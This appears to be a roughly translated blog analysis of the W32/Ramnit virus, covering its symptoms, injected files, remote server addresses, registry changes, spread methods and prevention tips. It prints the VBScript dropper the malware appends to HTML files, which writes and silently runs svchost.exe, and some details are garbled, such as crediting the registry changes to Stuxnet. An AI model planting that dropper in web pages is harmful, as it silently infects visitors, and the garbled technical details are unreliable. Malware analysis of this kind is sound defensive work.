In the current dominance of Stuxnet still booming today, should we also need to be alert against new malware variants that attempted to show its existence by the hard work of the malware authors. Among the variants of malware that is worth the watch was detected as W32/Ramnit by Norman Security Suite. Currently ramnit malware variants has spread rapidly throughout the world.
Family malware W32/Ramnit
Ramnit malware malware is not actually a new group, but has been actively spread also in 2010. Just because of malware such as user security hole LNK shortcut, sality, Stuxnet, which makes this malware is not a concern of the analysis and computer users in the world.
Just like Stuxnet, variant W32/Ramnit first appeared in mid-July and August 2010. While the second variant W32/Ramnit appear in October and November 2010, along with his scene-sality attack shortcut. And in mid-January 2011 is currently emerging is the third variant of W32/Ramnit family who tried to follow in the footsteps of its predecessors by using security holes LNK (shortcut) for infection and spread.
Characteristics W32/Ramnit
One of the things that make us need to be careful about that because this malware W32/Ramnit including groups that perform infectious virus files like Sality, Virut and Alman. This could be a scourge for computer users, because it will be difficult to clean the virus is doing file infection, especially executable files (application).
W32/Ramnit is one variant of a virus that does infection executable file (application). And not only executable files, but also do infections on the web file (HTML) and DLL (dynamic load library).
In addition, if you are connected to the internet, ramnit will contact a remote server (IRC server) and connect to multiple addresses zombie servers to download a bunch of malware (viruses, trojans, spyware). At a certain time, W32/Ramnit use ads and popups to the content of pornography and gambling (casinos) and other commercial advertising that would make you uncomfortable when about browsing and surfing.
Imagine if this happens when your child is under the age of the computer you're using protection with Parental Control. For parents it's a disaster in your child's exposure to pornography (because chances are that displayed pornographic content would escape the Parental Control in pairs) and for children it might be considered a "blessing" for protection in the tide of pornography which turned out to be tricked.
By co-use security loopholes LNK (shortcut), then the easier step to infect computer users with fast. Although not all of these three variants use a security hole W32/Ramnit LNK (shortcut), but almost all variants W32/Ramnit will be very difficult to clean.
Symptoms & Effects W32/Ramnit
Some symptoms that occur if you are infected is:
* Appears pop-up ads or pop-ups with pornographic content / gambling
In some particular time, the browser will open a pop-up ads or pop-ups that contain pornographic content or gambling (casino). This sometimes makes the computer user becomes uncomfortable.
* Appears script error pop-ups or error after a pop-up ads that appear
After the pop-up ads that appear, will appear a pop-up error or script error from the browser. It appears this error script much like a virus "ARP Spoofing" in 2008.
* Infection of EXE and DLL files
Just as the variants of malware sality, Alman and Virut, W32/Ramnit make exe file infection. Only W32/Ramnit also do infections on the DLL (dynamic load library).
Exe and dll files that are infections increased by about between 100-120 kb, depending on the variant that infects Ramnit. Nevertheless, not all exe and dll files that are infected.
* Injection HTML file
In addition to infect exe files and dll, W32/Ramnit also perform the injection of HTML files. Injection is done by adding the header and footer.
In the header, W32/Ramnit add a script:
DropFileName = "svchost.exe"
While in the footer, W32/Ramnit add a script:
Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder (2) & '\ "DropFileName
If FSO.FileExists (DropPath) = False Then
Set fileobj = FSO.CreateTextFile (DropPath, True)
For i = 1 To Len (WriteData) Step2
Fileobj.write chr (CLng ("& H" & Mid (WriteData, i, 2)))
Next
Fileobj.close
End If
Set WshShell = CreateObject ("WScript.Shell")
WSHshell.Run DropPath, 0
Creating Windows services function to be blank
With action to inject files and files on the file IEXPLORE.EXE services.exe, as well as adding a script on the web files (htm / html) making the function of the Windows services to be blank.
* Make the computer hangs / slow and even a network connection becomes disconnected.
Windows system files that will be targeted injection W32/Ramnit namely:
* C: \ WINDOWS \ system32 \ svchost.exe (file system associated with a network connection, by injecting will make the network disconnected)
* C: \ WINDOWS \ system32 \ lsass.exe (file system-related computer activities, by injecting will make the computer hangs / slow).
* C: \ WINDOWS \ system32 \ services.exe (file system-related services and drivers running)
* C: \ Program Files \ Internet Explorer \ IEXPLORE.EXE (executable files from the Internet Explorer browser)
* Active in the process of memory
Malware W32/Ramnit try to connect to the Remote Server using Internet Explorer that has been in the injection. This can take a look at the task manager, even though we are not open IE / Internet Explorer
* Connecting to a Remote Server
Malware W32/Ramnit connect to the Remote Server to perform the necessary delivery information on the Remote Server. Remote Server is used that is among his:
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
* To transfer data to a Remote Server
Besides trying to connect and communicate with a remote server, W32/Ramnit also tried to transfer data from the victim's computer to the Remote Server and vice versa send malware files into the victim's computer.
Do broadcast
Just as it was worm Conficker, W32/Ramnit also broadacast on the network. What was different was to W32/Ramnit only perform at one address, namely: ADX.ADNXS.COM File viruses W32/Ramnit
Malware W32/Ramnit created using the C programming language is compressed using UPX. Malware files have the following characteristics:
* Measuring 105 kb
* Type the file 'Application'
* Use the icon "music folder"
* Extension "exe"
W32/Ramnit When run, it will inject some Windows system files are:
* C: \ WINDOWS \ system32 \ lsass.exe
* C: \ WINDOWS \ system32 \ svchost.exe
* C: \ WINDOWS \ system32 \ services.exe
* C: \ Program Files \ Internet Explorer \ IEXPLORE.EXE
If connected to the internet, W32/Ramnit will download some files and folders malware as follows:
* C: \ Documents and Settings \% username% \ Local Settings \ Temp \ [number]. Tmp
* C: \ Documents and Settings \% username% \ Local Settings \ Temp \ explorer.dat
* C: \ Documents and Settings \% username% \ Local Settings \ Temp \ winlogon.dat
* C: \ Documents and Settings \% username% \ Local Settings \ Temp \ [random_name]. Exe
* C: \ Documents and Settings \% username% \ Start Menu \ Programs \ [random_name].. Exe
* C: \ Program Files \ Intenet Explorer \ complete.dat
* C: \ Program Files \ Intenet Explorer \ dmlconf.dat
* C: \ Program Files \ win \ [random_number]. Exe
* C: \ Program Files \ qwe
* C: \ WINDOWS \ [random_name].]. Exe
* C: \ WINDOWS \ System32 \ [random_name]. Etc.
* C: \ WINDOWS \ System32 \ [random_name]. Etc.
* C: \ WINDOWS \ Temp \ [number]. Tmp
In addition, W32/Ramnit doing the injection of some the following file (if any) are:
* C: \ contacts.html
* C: \ Inetpub \ wwwroot \ index.html
* C: \ Program Files \ Common Files \ designer \ MSADDNDR.DLL
* C: \ Program Files \ Common Files \ designer \ MSHTMPGD.DLL
* C: \ Program Files \ Common Files \ designer \ MSHTMPGR.DLL
* C: \ Program Files \ Common Files \ System \ ado \ MDACReadme.htm
* C: \ Program Files \ Common Files \ System \ Ole DB \ MSDAIPP.DLL
* C: \ Program Files \ MSN \ MSNCoreFiles \ OOBE \ obelog.dll
* C: \ Program Files \ MSN \ MSNCoreFiles \ OOBE \ obemetal.dll
* C: \ Program Files \ MSN \ MSNCoreFiles \ OOBE \ obepopc.dll
* C: \ Program Files \ MSN \ MSNIA \ custdial.dll
* C: \ Program Files \ MSN \ MSNIA \ msniasvc.exe
* C: \ Program Files \ MSN \ MSNIA \ prestp.exe
* C: \ Program Files \ MSN \ MsnInstaller \ iasvcstb.dll
* C: \ Program Files \ MSN \ MsnInstaller \ msdbxi.dll
* C: \ Program Files \ MSN \ MsnInstaller \ msninst.dll
* C: \ Program Files \ MSN \ MsnInstaller \ msninst.exe
* C: \ Program Files \ MSN \ MsnInstaller \ msnsign.dll
* C: \ Program Files \ NetMeeting \ netmeet.htm
In addition to the removable disk / drive will create several files, namely:
* Autorun.inf
* Copy of Shortcut to (1). Lnk
* Copy of Shortcut to (2). Lnk
* Copy of Shortcut to (3). Lnk
* Copy of Shortcut to (4). Lnk
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak1]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak2]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak3]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak4]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak5]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak6]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak7]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak8]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak9]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak10]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak11]. Exe
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak1]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak2]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak3]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak4]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak5]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak6]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak7]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak8]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak9]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak10]. Cpl
* RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130 / [namaacak11]. Cpl
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak1]. Exe
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak2]. Exe
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak3]. Exe
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak4]. Exe
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak5]. Exe
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak6]. Exe
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak7]. Exe
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak1]. Cpl
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak2]. Cpl
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak3]. Cpl
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak4]. Cpl
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak5]. Cpl
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak6]. Cpl
* RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180 / [namaacak7]. Cpl
PS : namaacak = random name
As well as on the network using mapped drives, trying to inject some files that have the following names:
* Blank.htm
* Citrus Punch.htm
* Clear Day.htm
* Fiesta.htm
* Ivy.htm
* Leaves.htm
* Maize.htm
* Nature.htm
* Network Blitz.htm
* Pie Charts.htm
* Sunflower.htm
* Sweets.htm
* Technical.htm
Registry Modifications
Some registry modifications made by the worm Stuxnet are as follows:
* Adding a Registry
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run
[random_name]. = C: \ Documents and Settings \% username% \ Local Settings \ Temp \ [random_name]. exe
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Enum \ Root \ LEGACY_60DFFE60
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Enum \ Root \ LEGACY_60DFFE60 \ 0000
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Enum \ Root \ LEGACY_60DFFE60 \ 0000 \ Control
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Enum \ Root \ LEGACY_60DFFE60
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Enum \ Root \ LEGACY_60DFFE60 \ 0000
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Enum \ Root \ LEGACY_60DFFE60 \ 0000 \ Control
HKEY_USERS \. DEFAULT \ Software \ Microsoft \ Internet Explorer \ Main \ featurecontrol
HKEY_USERS \. DEFAULT \ Software \ Microsoft \ Internet Explorer \ Main \ featurecontrol \ FEATURE_BROWSER_EMULATION
HKEY_USERS \. DEFAULT \ Software \ Microsoft \ Internet Explorer \ International
* Deleting Registry
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ SystemRes tore]
DisableSR = 0x00000001
* Changing the Registry
[HKEY_USERS \. DEFAULT \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings \ Zones \ 3]
CurrentLevel =
1601 =
Deployment Methods
Some ways W32/Ramnit make the distribution as follows:
* Drive by download (exploit)
W32/Ramnit initially spread by exploiting features of the drive by download on a Windows system. With links that are scattered on the forum or e-mail, trying to trick the user to run the link. In addition, when access to websites that provide content or browser plugins for download.
* Removable drive / disk
This method is commonly done by computer users. W32/Ramnit make a lot of files to infect a computer, and were also exploit security loopholes LNK (shortcut).
W32/Ramnit infect removable disks / drives
* Network
W32/Ramnit trying to do the injection of some web files (htm) specified in the network on a computer that did the drive mapping. The following files are:
o Blank.htm
o Citrus Punch.htm
o Clear Day.htm
o Fiesta.htm
o Ivy.htm
o Leaves.htm
o Maize.htm
o Nature.htm
o Network Blitz.htm
o Pie Charts.htm
o Sunflower.htm
o Sweets.htm
o Technical.htm
Malware Prevention Tips from W32/Ramnit
1. Turn on Windows Firewall or use other firewall software. This is to prevent the access of undesirable
2. Make sure the computer is to get the latest updates from the Windows system. To facilitate use automatic updates of the system as "Automatic Updates". Or it could also download the latest patch from the Microsoft website.
3. Use antivirus always updated with the good. This is to facilitate to the variants of the new malware.
4. Restrict access to administrator access. For users of Windows 7 and Vista, make sure the UAC (user account control) has been running well.
5. Be cautious when opening e-mail attachment or when receiving a transfer of files from strangers. Always on the scan with an updated antivirus.
6. Be wary of programs crack / keygen or programs that are not known. Because it could have been infected with or contain malware.
7. Use a password that is not easy to read and known. Always change the password at a particular time, and distinguish passwords with one another.
8. Turn off features "autoplay" Windows to prevent unwanted programs on a removable drive / disk runs automatically
9. Turn off file sharing if not used. If you do use file sharing only read-only status, or configuration-sharing only to specific users.
10. Be careful when accessing a website or a forum that provides certain links to download or install
0 comments:
Post a Comment